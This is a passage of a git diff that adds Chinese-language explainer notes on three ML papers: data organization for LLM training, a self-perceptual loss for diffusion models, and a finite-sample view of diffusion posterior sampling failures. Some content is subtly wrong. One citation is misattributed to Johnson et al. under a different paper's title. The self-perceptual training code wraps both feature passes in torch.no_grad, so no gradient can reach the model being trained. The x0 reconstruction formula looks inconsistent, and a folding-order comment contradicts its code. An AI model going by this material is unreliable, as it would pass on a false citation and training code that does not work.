len(segment_bounds) - 1 and pct == 1.0): + segments[seg_id].append(sample_id) + break + + order: list[int] = [] + for seg in segments: + seg_arr = np.array(seg, dtype=np.int64) + rng.shuffle(seg_arr) + order.extend(seg_arr.tolist()) + return np.array(order, dtype=np.int64) + + +def jit_local_shuffle(order: np.ndarray, window: int, rng: np.random.Generator | None = None) -> np.ndarray: + """ + 简化版 JIT (G4): 在滑动窗口内 shuffle,保留全局大致进度,提高局部 score 多样性。 + 论文中 window w 对 CL/FO/ZIG 分别调参(如 5000、50000)。 + """ + rng = rng or np.random.default_rng(1) + out = order.copy() + n = len(out) + + for start in range(0, n, window): + end = min(start + window, n) + chunk = out[start:end].copy() + rng.shuffle(chunk) + out[start:end] = chunk + return out + + +# --- 演示:100 条样本,低分起步 + 高分收尾 + JIT --- +rng = np.random.default_rng(42) +scores = rng.uniform(0, 1, size=100) +seg_order = segment_order(scores, [(0.0, 0.1), (0.1, 0.9), (0.9, 1.0)], rng=rng) +final_order = jit_local_shuffle(seg_order, window=10, rng=rng) + +# 检查「开头 / 结尾」平均分数是否符合 G1 意图 +print("head mean score:", scores[final_order[:10]].mean()) +print("tail mean score:", scores[final_order[-10:]].mean()) +print("global head->tail trend OK:", scores[final_order[:10]].mean() < scores[final_order[-10:]].mean()) +``` + +**工程提示**:真实 STR/SAW 还要在 section 之间的 **过渡区** 插入 FO 或 ZIG(G2/G3),并对接分布式 dataloader 的 **deterministic shuffle seed**。论文强调:JIT 应作为 **最后一步** 加在 $f_o$ 输出上,避免破坏全局课程结构。 + +--- + +## 代码示例 3:把组织接到训练 loop(概念骨架) + +```python +# 伪代码:同一分数向量驱动 selection + organization +gamma = load_prewcomputed_scores(corpus) # FineWeb-Edu / QuRated,离线算一次 + +# 可选:筛选 top-R +top_k = int(0.5 * len(gamma)) +selected_ids = np.argsort(-gamma)[:top_k] + +# 组织:SAW-2(JIT) — 生产环境应调用官方 data-efficacy 实现 +ordered_ids = saw_order(gamma[selected_ids], num_sections=2, transition="zigzag") +ordered_ids = jit_local_shuffle(ordered_ids, window=5000) + +train_loader = build_loader(corpus, ordered_ids, shuffle=False) # 顺序由 f_o 决定,不再 random shuffle + +for step, batch in enumerate(train_loader): + loss = model.training_step(batch) + loss.backward() + optimizer.step() +``` + +关键点:`shuffle=False` —— 顺序本身就是 **训练信号** 的一部分;若再 random shuffle,会破坏 G1–G3 精心构造的轨迹。 + +--- + +## 局限与依赖 + +1. **分数质量决定上限**:组织策略完全依赖 $\bm{\gamma}$。分数噪声大、与任务无关时,排序可能有害。论文明确承认这是主要 limitation。 +2. **不是万能替代数据筛选**:组织 **不改变** $|\mathcal{D}|$;低质量 corpus 靠排序无法变魔法。 +3. **超参敏感**:FO 的层数 $L$、SEG 的百分位区间、JIT 的窗口 $w$、STR/SAW 的 section 数 $K$ 和过渡半径 $\rho$ 都需要验证(论文对 $L$ 做了 grid search,FO-20/FO-100 可能退化)。 +4. **分布式训练细节**:全局顺序 vs 多 worker 分片、resume checkpoint 时的顺序一致性,生产系统要额外工程化(论文 focus 在算法与单轨实验)。 + +--- + +## 谁应该关心这篇论文 + +| 角色 | 可行动项 | +|------|---------| +| 预训练工程师 | 若已有 QuRating / FineWeb-Edu 分数 pipeline,**加一层 $f_o$** 几乎零成本 | +| 数据平台 | 把 score 从「一次性 filter」升级为 **filter + rank API** | +| 研究者 | 四条 guidance 提供了比「单调 CL」更细的 ablation 语言 | +| 微调工程师 | SFT 阶段在 DeepMath / OpenCodeInstruct 上同样有效,不仅限于 pretrain | + +--- + +## 一句话总结 + +**Demystifying Data Organization for Enhanced LLM Training** 告诉我们:在大模型 **少 epoch、大数据** 的训练范式下,**同一批数据怎么排队** 与 **选哪批数据** 同样重要。复用已有的 sample-level score,按 **边界锐化、周期复习、平滑过渡、局部多样** 四条原则组织序列,STR/SAW 能在 **不增加训练 token、几乎不增加算力** 的前提下,稳定提升预训练与 SFT 的效果——就像同一套题库,换一张更科学的课表,期末均分就能上去。 + +--- + +## 延伸阅读 + +- FineWeb-Edu / QuRating:分数从哪来 +- DELT (Dai et al., 2025a):折叠复习的相关工作 +- Curriculum Learning (Bengio et al., 2009):本文特例化的基线 +- 官方实现:[https://github.com/microsoft/data-efficacy/](https://github.com/microsoft/data-efficacy/) diff --git a/src/content/docs/papers/demystifying-data-organization-for-enhanced-llm-training-arxiv-2605-30334.md b/src/content/docs/papers/demystifying-data-organization-for-enhanced-llm-training-arxiv-2605-30334.md new file mode 100644 index 000000000..187ef7c32 --- /dev/null +++ b/src/content/docs/papers/demystifying-data-organization-for-enhanced-llm-training-arxiv-2605-30334.md @@ -0,0 +1,273 @@ +--- +title: Demystifying Data Organization for Enhanced LLM Training +来源: https://arxiv.org/abs/2605.30334 +日期: 2026-06-13 +分类: 机器学习 +子分类: 模型与训练 +provenance: pipeline-v3 +--- + +# Demystifying Data Organization for Enhanced LLM Training + +## 一句话总结 + +这篇论文研究了 LLM 训练时的一个简单但被忽视的问题:**数据已经评分了,但应该按什么顺序喂给模型?** + +## 从日常类比开始 + +想象你要背单词。手头有一张 10000 个单词的清单,每个单词旁边都标了难度分数(1-5 分)。 + +传统做法有两种: +- **随机顺序**:闭眼翻到哪页背哪页 +- **从易到难排序**:先背 1 分的,再背 2 分的,最后背 5 分的 + +这篇论文说:等等,还有别的排法,而且可能更好。他们提出了 4 个"排序原则"和 2 种具体的排序方法。 + +## 核心概念:四个排序原则 + +### 1. 边界锐化(Boundary Sharpening) + +**类比**:考试时先做简单题建立信心,最后做难题挑战极限。或者反过来——先做难题"唤醒"大脑,再做简单题巩固信心。 + +**论文解释**:控制训练开始和结束时数据分数的分布。比如在训练开始时主要放高分数据(高质量),结束时放低分数据,或者反过来。 + +**为什么重要**:训练初期的数据对模型的第一印象影响很大。边界锐化就是让你能"导演"这个印象。 + +### 2. 周期调度(Cyclic Scheduling) + +**类比**:复习功课。学完新东西后,每隔几天回头复习一下旧的。不是只看最新的,而是循环往复。 + +**论文解释**:在单次训练中,周期性地把不同分数段的数据穿插进来。不是"背完所有简单词再背难的",而是"每背 10 个简单词,穿插 2 个难的"。 + +**为什么重要**:纯从易到难的排序可能导致模型忘记早期学的内容(灾难性遗忘)。周期调度让模型不断回看不同难度。 + +### 3. 课程连续性(Curriculum Continuity) + +**类比**:上体育课。你不能从散步直接跳到百米冲刺,需要逐渐加速。如果难度跳得太猛,模型会" shock"(优化器震荡)。 + +**论文解释**:避免数据分数出现突然的大幅跳跃,让训练过程平稳过渡。 + +**为什么重要**:优化器(模型学习时的"引擎")喜欢循序渐进的信号。突然的难度跳跃会让它迷失方向。 + +### 4. 局部多样性(Local Diversity) + +**类比**:看 Netflix 不会连续看 10 集同样的剧。每次推荐的内容应该有变化——不同的主题、不同的风格。 + +**论文解释**:在局部窗口(比如一个小批次的数据)内,保持数据的异质性,不要全是高分或低分。 + +**为什么重要**:多样性让模型学到更广泛的特征。一直吃"同一道菜",营养不均衡。 + +## 两种新方法:STR 和 SAW + +论文在四大原则基础上,提出了两种排序方法: + +| 方法 | 全称 | 核心思想 | +|------|------|----------| +| **STR** | Stair Ordering(阶梯排序) | 把数据分层,在每层的"过渡区"用折叠排序,其余部分用阶梯式递进 | +| **SAW** | Saw Ordering(锯齿排序) | 和 STR 类似,但在过渡区用之字形排序,形成锯齿状的数据流 | + +**直观理解**: + +- STR 像上楼梯:一步一步往上走,但在每层之间有个小折返 +- SAW 像锯子的齿:锯齿状来回摆动,整体趋势是单向的 + +两种方法都保留了"从易到难"的大趋势,同时在局部加入波动来增加多样性。 + +## 代码示例 + +### 示例 1:基本的数据排序流程 + +假设你已经有一组带分数的数据(比如每个样本有个 `average_test_score` 字段),想对它排序: + +```python +import json + +# 1. 加载带分数的数据 +# 假设每个样本格式:{"text": "Hello world", "average_test_score": 3.7} +data = [] +with open("scored_data.jsonl", "r") as f: + for line in f: + data.append(json.loads(line)) + +# 2. 按分数排序(最简单的 baseline) +data_sorted = sorted(data, key=lambda x: x["average_test_score"]) + +# 3. 写回 JSONL +with open("ordered_data.jsonl", "w") as f: + for item in data_sorted: + f.write(json.dumps(item) + "\n") +``` + +这是论文中的 `sorting` 基线方法——单纯从低分到高分排序。 + +### 示例 2:实现折叠排序(Folding Ordering) + +折叠排序是 STR 和 SAW 的基础。想象把数据排成一行,然后从中间"折叠"回来: + +```python +import numpy as np + +def folding_order(data, num_layers=5): + """ + 折叠排序: + 1. 先把数据按分数从低到高排序 + 2. 然后分成 num_layers 层 + 3. 奇数层正向,偶数层反向,依次连接 + """ + data_sorted = sorted(data, key=lambda x: x["average_test_score"]) + n = len(data_sorted) + layer_size = n // num_layers + + ordered = [] + for i in range(num_layers): + start = i * layer_size + end = start + layer_size if i < num_layers - 1 else n + + layer = data_sorted[start:end] + # 偶数层正向,奇数层反向(形成折叠效果) + if i % 2 == 0: + ordered.extend(layer) + else: + ordered.extend(reversed(layer)) + + return ordered + +# 使用 +ordered_data = folding_order(data, num_layers=5) +``` + +**折叠的效果**:模型先学低分数据(第 0 层正向),然后回看高分数据(第 1 层反向),再回到低分(第 2 层正向)... 形成周期调度。 + +### 示例 3:实现锯齿排序(SAW)的简化版 + +SAW 在折叠的基础上,在"过渡区域"加入锯齿波动: + +```python +def saw_order(data, num_layers=5, transition_ratio=0.1): + """ + 锯齿排序(SAW)简化版: + 1. 数据按分数排序 + 2. 分成 num_layers 层 + 3. 每层内部的"过渡区"用锯齿式排列,其余部分保持有序 + """ + data_sorted = sorted(data, key=lambda x: x["average_test_score"]) + n = len(data_sorted) + layer_size = n // num_layers + transition_size = int(layer_size * transition_ratio) + + ordered = [] + for i in range(num_layers): + start = i * layer_size + end = start + layer_size if i < num_layers - 1 else n + layer = data_sorted[start:end] + + if len(layer) <= 2 * transition_size: + # 数据太少,直接翻转 + if i % 2 == 1: + ordered.extend(reversed(layer)) + else: + ordered.extend(layer) + continue + + # 头部(非过渡区):按原顺序 + ordered.extend(layer[:transition_size]) + + # 过渡区:用锯齿式排列 + trans_start = transition_size + trans_end = len(layer) - transition_size + trans_region = layer[trans_start:trans_end] + trans_region_sorted = sorted(trans_region, key=lambda x: x["average_test_score"]) + + # 锯齿:从两端交替取元素 + left, right = 0, len(trans_region_sorted) - 1 + zigzag = [] + toggle = True + while left <= right: + if toggle: + zigzag.append(trans_region_sorted[left]) + left += 1 + else: + zigzag.append(trans_region_sorted[right]) + right -= 1 + toggle = not toggle + ordered.extend(zigzag) + + # 尾部(非过渡区):按原顺序 + ordered.extend(layer[trans_end:]) + + return ordered + +# 使用 +saw_data = saw_order(data, num_layers=5, transition_ratio=0.1) +``` + +**锯齿的效果**:整体仍从低分到高分,但在每层的过渡区加入锯齿波动。既有课程连续性(不会太跳),又有局部多样性(不是单调递增)。 + +## 完整流程图 + +``` +原始数据(带分数) + │ + ▼ +┌─────────────┐ +│ 数据评分 │ ← 这一步论文假设已完成(复用已有分数) +│ (Data Scoring)│ +└──────┬──────┘ + │ + ▼ +┌─────────────┐ +│ 数据筛选 │ ← 从大数据中选出一子集(可选) +│ (Selection) │ +└──────┬──────┘ + │ + ▼ +┌─────────────┐ +│ 数据排序 │ ← 这篇论文的重点! +│ (Ordering) │ 应用 STR / SAW / 折叠 / 之字形等 +└──────┬──────┘ + │ + ▼ +┌─────────────┐ +│ 模型训练 │ +│ (Training) │ +└──────┬──────┘ + │ + ▼ + 更好的模型 +``` + +## 实验发现 + +论文在多个模型规模和数据集上做了实验,主要发现: + +1. **STR 和 SAW 在所有规模上都优于随机排序** — 不是只在大数据集上有用 +2. **预训练和 SFT(监督微调)两个阶段都有效** — 排序的重要性贯穿整个训练流程 +3. **SAW 通常略优于 STR** — 锯齿的波动比阶梯的过渡能带来更多多样性 +4. **四个原则相互之间不冲突** — 可以同时应用,没有明显的 trade-off + +## 关键对比:不同排序方法的直观效果 + +假设有 30 条数据,分数从 1 到 10: + +``` +随机排序: [3, 8, 1, 9, 2, 7, 5, 10, 4, 6, ...] ← 完全无规律 +排序基线: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, ...] ← 单调递增,缺少多样性 +折叠排序: [1,2,3, 9,8,7, 4,5,6, 10, ...] ← 折叠回看 +SAW: [1,2,3, 3,4,5, 5,4,6, 6,7,8, 8,7,9, ...] ← 锯齿波动 + 大趋势递增 +``` + +SAW 看起来最"乱",但仔细看它的整体趋势仍然是递增的——这就是论文的精髓:**大局有序,局部有变**。 + +## 学习要点总结 + +- 数据质量重要,**数据顺序同样重要** — 这是论文的核心论点 +- 四个原则(边界锐化、周期调度、课程连续性、局部多样性)是通用的排序指导方针 +- STR 和 SAW 是具体可执行的排序算法,不是纯理论 +- 即使已有数据的评分,只需要改变顺序就能获得性能提升,成本极低 +- 排序方法在预训练和微调阶段都适用 + +## 延伸阅读 + +- 论文代码仓库:https://github.com/microsoft/data-efficacy/ +- 前置工作(DELT):https://arxiv.org/abs/2506.21545 +- 课程学习(Curriculum Learning)经典论文:https://arxiv.org/abs/0906.0530 diff --git a/src/content/docs/papers/diffusion-perceptual-loss.md b/src/content/docs/papers/diffusion-perceptual-loss.md new file mode 100644 index 000000000..c6ded9cbe --- /dev/null +++ b/src/content/docs/papers/diffusion-perceptual-loss.md @@ -0,0 +1,412 @@ +--- +title: Diffusion Model with Perceptual Loss +来源: https://arxiv.org/abs/2401.00110 +日期: 2026-06-13 +分类: 机器学习 +子分类: 扩散模型 +provenance: pipeline-v3 +--- + +# Diffusion Model with Perceptual Loss — 零基础学习笔记 + +> **论文**: Diffusion Model with Perceptual Loss (Lin & Yang, ByteDance, 2024) +> **arXiv**: 2401.00110 + +--- + +## 一、一句话讲清楚这篇论文在说什么 + +这篇论文回答了一个问题:**为什么不用 guidance 的扩散模型画出来的图那么糊?** + +作者说:不是模型不行,是**训练时用的"评分标准"(loss function)有问题**。他们把传统的方法从"逐个像素比较"换成了"让模型自己当裁判",结果不用 guidance 也能画出清晰的图。 + +--- + +## 二、日常类比:厨师做菜 + +想象你教一个学徒做蛋糕,有两个不同的方法: + +**方法 A(MSE 损失):用尺子量每一颗糖的位置。** 你拿一把尺子,量每一颗糖距离标准配方差了多少像素。学徒学会了精确摆放糖的位置,但做出来的蛋糕虽然"像素级"对齐了,整体口感却很差。因为糖的位置差了一点点,不代表蛋糕就不好吃。 + +**方法 B(Perceptual Loss):让一个美食家品尝。** 你找一个品过一万道甜点的老师傅,尝完学徒的蛋糕后说"还行"或"不太对"。老师傅不在乎糖差了几毫米,他在乎的是蛋糕整体好不好吃。 + +这篇论文说:扩散模型训练用的 MSE 就像方法 A — 它强迫模型在**像素级别**上精确匹配,结果模型学会了把不同的脸"糊在一起",造出有四只眼睛的怪物。而 Perceptual Loss 就像方法 B,关注的是**语义级别**好不好。 + +--- + +## 三、核心概念 + +### 3.1 扩散模型在学什么? + +扩散模型(Diffusion Model)的训练目标是:**学习从纯噪声变回真实数据的还原过程**。 + +训练时,模型接收一张被加了噪声的图片,尝试预测"原本的干净图片是什么样子"。预测完之后,需要跟正确答案对比,算出一个"错误分数",这个分数就是 loss。 + +### 3.2 MSE 损失的问题(核心痛点) + +扩散模型几乎全部使用 **MSE(均方误差)损失**: + +$$\mathcal{L}_{mse} = \| \hat{v}_t - v_t \|_2^2$$ + +翻译成人话:对图片里每一个像素点,计算预测值和真实值的差的平方,然后全部加起来。 + +**问题出在哪?** + +假设你训练一个生成人脸的扩散模型,训练数据里有两个人脸: + +- 人脸 A:左边有颗痣 +- 人脸 B:右边有颗痣 + +MSE 要求模型在像素级别上精确还原。于是模型学会了一个取巧的办法:**生成一张左半边脸 A + 右半边脸 B 的"拼接脸"**。在像素距离上,这张拼接脸确实离两张训练样本都不远,所以 MSE 觉得"挺好的"。 + +但人眼一看就知道:这是个有四只眼睛的怪物。 + +论文原话: + +> MSE leads the model to learn a distribution of pixel-wise blending instead of semantic morphing. + +MSE 让模型学会了"像素级混合",而不是"语义级融合"。 + +### 3.3 Perceptual Loss 的思路 + +Perceptual Loss 的核心思想来自一篇叫 "A Style-Based Generator Architecture for GANs" 的论文(Johnson et al., 2016)。它的方法是: + +1. 找一个已经训练好的神经网络(比如 VGG) +2. 不看图片本身,而是看图片经过这个网络中间层后的"特征表示" +3. 比较两张图片的特征表示之间的距离 + +**类比**:MSE 像是在比较两个人的身份证照片差了多少像素。Perceptual Loss 像是让一个认人专家来判断"这两个人像不像"。专家不在乎像素差多少,他看的是脸的特征。 + +### 3.4 Self-Perceptual Loss(本文的独创) + +传统的 Perceptual Loss 需要一个外部的预训练网络(比如 VGG)。这篇论文做了一个巧妙的简化:**直接用扩散模型自己当裁判**。 + +流程如下: + +``` +原始图片 x0 → 加噪声 → xt + ↓ + 模型预测 v^t → 还原出 x^0 + ↓ + 从 x^0 出发再走一步 → x^t'(预测路径) + 从 x0 出发走另一条路 → xt'(真实路径) + ↓ + 把 x^t' 和 xt' 同时塞进"冻结的模型" + 比较它们中间层的特征距离 = 感知损失 +``` + +关键点: + +- 冻结(freeze)训练好的 MSE 模型,不改变它的参数 +- 把冻结的模型当作品味家(perceptual network) +- 比较预测路径和真实路径在中间层的差异 +- 用这个差异来指导训练 + +论文中公式: + +$$\mathcal{L}_{sp} = \| p^l_*(\hat{x}_{t'}, t', c) - p^l_*(x_{t'}, t', c) \|_2^2$$ + +不用被公式吓到。拆解来看: + +- `p^l_*`:冻结的模型的第 l 层(只取中间层的特征,不看输出) +- `\hat{x}_{t'}`:模型自己预测出来的路径 +- `x_{t'}`:从真实数据出发走过的路径 +- 两者的特征距离就是新的损失 + +### 3.5 为什么 guidance 有效? + +一个有趣的发现:这篇论文从 Perceptual Loss 的角度重新解释了 CFG(Classifier-Free Guidance)为什么有效。 + +传统解释:CFG 降低了采样温度,提高了质量。 + +本文解释:CFG 本质上也是在提供**感知监督**。CFG 同时查询条件版本和无条件版本的模型,放大它们的差异。这个差异的方向,恰好跟"语义上更像真实数据"的方向一致。换句话说,CFG 的效果类似于在采样阶段加了一个临时的 Perceptual Loss。 + +--- + +## 四、代码示例 + +### 示例 1:传统 MSE 损失 vs Self-Perceptual 损失 的对比 + +```python +import torch +import torch.nn as nn +import torch.nn.functional as F + +# 假设我们有一个预训练的扩散模型(比如 Stable Diffusion) +# 它已经被 MSE 损失训练好了 + +diffusion_model = load_diffusion_model() # 加载已训练的模型 + +# ========== 方法 A:传统 MSE 损失 ========== +def mse_loss(pred_noise, true_noise): + """ + 传统 MSE 损失:直接比较预测的噪声和真实的噪声 + 逐像素比较,不管语义 + """ + return F.mse_loss(pred_noise, true_noise) + + +# ========== 方法 B:Self-Perceptual 损失 ========== +def self_perceptual_loss(frozen_model, x_pred, x_true, t, condition): + """ + Self-Perceptual 损失: + - frozen_model: 冻结的扩散模型,用作"品味家" + - x_pred: 模型预测的路径(从预测结果还原后再走一步) + - x_true: 真实数据路径(从真实数据走相同时间步) + - t: 时间步 + - condition: 条件(比如文本 prompt) + + 只取 midblock 层的特征来计算距离 + """ + # 冻结模型的特征提取 + frozen_model.eval() + with torch.no_grad(): + # 获取冻结模型在 midblock 层的特征 + pred_features = frozen_model.get_midblock_features(x_pred, t, condition) + true_features = frozen_model.get_midblock_features(x_true, t, condition) + + # 比较特征距离 + return F.mse_loss(pred_features, true_features) + + +# ========== 训练循环对比 ========== + +def train_with_mse(model, batch, optimizer): + """传统 MSE 训练""" + x0, text = batch # 真实图片、文本描述 + t = torch.randint(0, 1000, (x0.shape[0],)) # 随机时间步 + noise = torch.randn_like(x0) + + # 加噪声 + xt = add_noise(x0, noise, t) + + # 模型预测噪声 + predicted_noise = model(xt, t, text) + + # 计算 MSE 损失 + loss = mse_loss(predicted_noise, noise) + + # 反向传播 + optimizer.zero_grad() + loss.backward() + optimizer.step() + return loss + + +def train_with_self_perceptual(model, batch, frozen_model, optimizer): + """Self-Perceptual 训练""" + x0, text = batch + t = torch.randint(0, 1000, (x0.shape[0],)) + noise = torch.randn_like(x0) + + # 加噪声 + xt = add_noise(x0, noise, t) + + # 第一步:模型预测噪声 + predicted_noise = model(xt, t, text) + + # 第二步:从预测结果还原干净图片 + x0_pred = reconstruct_clean_image(xt, predicted_noise, t) + + # 第三步:再随机选一个时间步 t_prime + t_prime = torch.randint(0, 1000, (x0.shape[0],)) + + # 第四步:预测路径和真实路径 + x_pred_t_prime = add_noise(x0_pred, noise, t_prime) + x_true_t_prime = add_noise(x0, noise, t_prime) + + # 第五步:用冻结模型计算感知损失 + loss = self_perceptual_loss( + frozen_model, x_pred_t_prime, x_true_t_prime, t_prime, text + ) + + # 反向传播 + optimizer.zero_grad() + loss.backward() + optimizer.step() + return loss +``` + +### 示例 2:完整的训练流程(简化版) + +```python +import torch +import torch.nn as nn +from torch.utils.data import DataLoader + +# 配置 +BATCH_SIZE = 896 +LEARNING_RATE = 3e-5 +EMA_DECAY = 0.9995 +NUM_ITERATIONS = 50000 +DEVICE = "cuda" if torch.cuda.is_available() else "cpu" + + +class SelfPerceptualTrainer: + """ + Self-Perceptual Loss 训练器 + 两阶段训练: + 阶段1:用 MSE 训练扩散模型 + 阶段2:冻结模型,用它当感知网络,继续训练 + """ + + def __init__(self, model, perceptual_model, optimizer): + self.model = model.to(DEVICE) + self.perceptual_model = perceptual_model.to(DEVICE) # 冻结的 + self.perceptual_model.eval() # 设为评估模式 + for param in self.perceptual_model.parameters(): + param.requires_grad = False # 冻结参数 + self.optimizer = optimizer + + def forward_diffusion(self, x0, noise, t): + """前向加噪声过程""" + # alpha_bar 是预定义的噪声调度 + alpha_bar = get_alpha_bar(t) + sqrt_alpha = torch.sqrt(alpha_bar) + sqrt_one_minus_alpha = torch.sqrt(1 - alpha_bar) + + # xt = sqrt(alpha_bar) * x0 + sqrt(1 - alpha_bar) * noise + return sqrt_alpha[:, None, None, None] * x0 + \ + sqrt_one_minus_alpha[:, None, None, None] * noise + + def reconstruct_x0(self, xt, predicted_v, t): + """ + 从预测的 v 值反推干净图片 x0 + v = sqrt(alpha_bar) * noise - sqrt(1 - alpha_bar) * x0 + 反解出 x0 + """ + alpha_bar = get_alpha_bar(t) + sqrt_alpha = torch.sqrt(alpha_bar) + sqrt_one_minus_alpha = torch.sqrt(1 - alpha_bar) + + # 从 v 反推 x0 + return (sqrt_alpha[:, None, None, None] * xt - predicted_v) / \ + sqrt_one_minus_alpha[:, None, None, None] + + def compute_self_perceptual_loss(self, x0, xt, t, condition): + """ + 计算 Self-Perceptual 损失 + """ + noise = torch.randn_like(x0) + + # Step 1: 模型预测 + predicted_v = self.model(xt, t, condition) + + # Step 2: 从预测反推干净图片 + x0_pred = self.reconstruct_x0(xt, predicted_v, t) + + # Step 3: 再选一个新的时间步 + t_prime = torch.randint(0, 1000, (x0.shape[0],)) + + # Step 4: 从两个方向走到 t_prime + x_true_t_prime = self.forward_diffusion(x0, noise, t_prime) + x_pred_t_prime = self.forward_diffusion(x0_pred, noise, t_prime) + + # Step 5: 冻结模型提取 midblock 特征 + with torch.no_grad(): + pred_feat = self.perceptual_model.get_midblock_features( + x_pred_t_prime, t_prime, condition + ) + true_feat = self.perceptual_model.get_midblock_features( + x_true_t_prime, t_prime, condition + ) + + # Step 6: 特征距离 + loss = F.mse_loss(pred_feat, true_feat) + return loss + + def train_step(self, x0, condition): + """单个训练步骤""" + t = torch.randint(0, 1000, (x0.shape[0],)) + noise = torch.randn_like(x0) + xt = self.forward_diffusion(x0, noise, t) + + # 计算 Self-Perceptual 损失 + loss = self.compute_self_perceptual_loss(x0, xt, t, condition) + + # 反向传播 + self.optimizer.zero_grad() + loss.backward() + + # 梯度裁剪,防止爆炸 + torch.nn.utils.clip_grad_norm_(self.model.parameters(), max_norm=1.0) + + self.optimizer.step() + return loss.item() + + def train_epoch(self, dataloader): + """训练一个 epoch""" + self.model.train() + total_loss = 0 + + for x0, condition in dataloader: + x0 = x0.to(DEVICE) + loss = self.train_step(x0, condition) + total_loss += loss + + avg_loss = total_loss / len(dataloader) + return avg_loss + + +# 使用示例 +def main(): + # 第一阶段:MSE 训练(假设已完成) + mse_model = build_diffusion_model() + mse_optimizer = torch.optim.Adam(mse_model.parameters(), lr=1e-4) + # ... 训练 mse_model ... + + # 第二阶段:复制并冻结 MSE 模型作为感知网络 + perceptual_model = build_diffusion_model() + perceptual_model.load_state_dict(mse_model.state_dict()) + + # 用 SP 损失微调原始模型 + sp_model = build_diffusion_model() + sp_model.load_state_dict(mse_model.state_dict()) + sp_optimizer = torch.optim.Adam(sp_model.parameters(), lr=LEARNING_RATE) + + trainer = SelfPerceptualTrainer(sp_model, perceptual_model, sp_optimizer) + + # 开始 SP 训练 + for epoch in range(NUM_ITERATIONS // len(train_dataloader)): + avg_loss = trainer.train_epoch(train_dataloader) + print(f"Epoch {epoch}, SP Loss: {avg_loss:.4f}") +``` + +--- + +## 五、关键实验结果 + +| 方法 | CFG | FID(越低越好) | IS(越高越好) | +|------|-----|----------------|----------------| +| MSE Loss | 否 | 29.63 | 22.86 | +| **SP Loss** | **否** | **24.42** | **28.07** | +| MSE + CFG | 是 | 18.67 | 34.17 | + +SP Loss 在**不需要 guidance 的情况下**,FID 从 29.63 降到 24.42,IS 从 22.86 升到 28.07,显著改善。 + +--- + +## 六、重要发现总结 + +1. **MSE loss 假设了像素独立性**,但图像像素之间高度相关,这个假设在现实中不成立 +2. **Perceptual Loss 关注语义级别**,能避免模型产生"四只眼睛"这种像素级正确但语义级错误的样本 +3. **CFG 有效的真正原因**可能是它提供了感知监督,而不只是降低采样温度 +4. **只用 midblock 层的特征效果最好**,其他层反而不好 — 说明中间层捕捉到的语义信息最合适 +5. **从模型自己提取感知信号是可行的**,不需要引入外部网络,方便微调已有模型 +6. **t' 均匀采样效果最好**,不需要复杂的采样策略 + +--- + +## 七、这篇论文的局限 + +- 目前还没有超过 CFG + Rescale 的效果 +- SP 主要改善的是"不用 guidance 时的质量",而不是完全取代 guidance +- 作者说未来可以探索结合 SP 和 CFG 的方法 + +--- + +## 八、我的理解 + +传统思路一直在改扩散模型的结构(卷积→Transformer)、采样算法(更多 solver)、训练技巧,但很少有人质疑**训练目标本身可能就不合适**。这篇论文的贡献在于:它回到了最根本的问题 — "我们到底在优化什么?" — 然后说"我们一直在用尺子量蛋糕,但也许应该让品味家来尝"。 + +MSE 不是"错的",它在数学推导上很优雅,但它追求的是"像素级的准确",而图像生成需要的是"语义级的合理"。这是一个根本性的不匹配。Perceptual Loss 补上了这个缺口。 diff --git a/src/content/docs/papers/diffusion-posterior-finite.md b/src/content/docs/papers/diffusion-posterior-finite.md new file mode 100644 index 000000000..fdcbfe09a --- /dev/null +++ b/src/content/docs/papers/diffusion-posterior-finite.md @@ -0,0 +1,262 @@ +--- +title: 扩散后验采样何时失败?——有限样本透镜(Finite-Sample Lens) +来源: https://arxiv.org/abs/2605.30330 +日期: 2026-06-13 +分类: 机器学习 +子分类: 模型与训练 +provenance: pipeline-v3 +--- + +## 从日常类比开始:侦探拼图 vs 蒙眼猜形状 + +想象你是侦探,手里有一张**模糊的监控截图**(测量值 \(y\)),要在**嫌疑人名单**里找出最像真凶的人(后验 \(p(x \mid y)\))。 + +名单上每个人长相、身高、习惯都不同——这就是**先验** \(p_{\text{pr}}(x)\),往往很复杂、多峰(有人像猫、有人像狗、有人像鸟)。 + +**扩散后验采样(Diffusion Posterior Sampling, DPS)** 的做法像: + +1. 先把所有嫌疑人照片**故意弄糊**(加噪到中间时刻 \(x_t\)); +2. 每一步根据「模糊照片 + 监控截图」微调,让轨迹逐渐变清晰; +3. 最后得到一张「既像名单里某人、又符合监控」的清晰照片。 + +问题在于:中间每一步,算法**不能精确算**「给定当前模糊图,真凶可能是谁、概率多大」——只能**近似**(常见做法:把可能性压成**一个点**,忽略 spread)。论文问的就是: + +> **这种近似什么时候会把侦探带偏?为什么?怎么诊断?** + +作者给出的答案不是再发明一个新 sampler,而是换一副**有限样本透镜(Finite-Sample Lens, FSR)**:把连续先验换成 \(N\) 张真实训练样本组成的离散分布,于是**中间任意时刻 \(t>0\) 的后验可以解析算出来**,当作「标准答案」去对比 DPS、ΠGDM、TMPD 等流行方法哪里错了。 + +--- + +## 是什么 + +**When, Why, and How Do Diffusion Posterior Samplers Fail? A Finite-Sample Lens**(Burns & Fridovich-Keil,arXiv:[2605.30330](https://arxiv.org/abs/2605.30330),2026)研究**成像逆问题**里用预训练扩散模型做**零样本后验采样**时的失败模式。 + +| 项目 | 内容 | +|------|------| +| 问题 | 现有方法在**中间时间步**对似然 \(p(y \mid x_t)\) 做近似以求可算;近似误差如何传导到最终后验,缺乏系统理解 | +| 方法 | **FSR**:先验 \(p_N^{\text{pr}}(x) = \frac{1}{N}\sum_i \delta(x - x^{(i)})\),推导 \(p_{t\mid y}^N(x_t \mid y)\) 的闭式(高斯混合) | +| 用途 | **即插即用诊断工具**:对比任意 likelihood 近似、线性/非线性前向模型 \(\mathcal{A}\) | +| 核心发现 | 流行近似常**低估或高估**中间后验的 spread → 早停敏感、模态权重错、**幻觉**(prior 模态 / likelihood 模态) | + +--- + +## 为什么重要 + +不理解这篇论文,下面现象只能「调参碰运气」: + +- DPS 重建图像**看起来不错**,但换测量噪声、换 early stopping 就崩 +- **多模态先验**(如 GMM、离散类别)下,采样总偏向某一个「像训练集」的模式,却**不是**真后验该重的模态 +- \(\zeta\)-DPS 调大 \(\zeta\) 有时更好、有时**模态坍缩**——没有 principled 解释 +- 终端样本 \(t=0\) 很 sharp,但轨迹曾经过**无条件边缘 \(p_t(x_t)\) 的低概率区域**,学到的 score 不可靠——换任务可能翻车 + +论文说明:**失败不必来自非线性测量或多模态后验**;**多模态先验 + 中间 spread 算错**就够了。 + +--- + +## 核心概念 + +### 1. 逆问题与后验采样 + +观测模型: + +\[ +y = \mathcal{A}(x_0) + \eta, \quad \eta 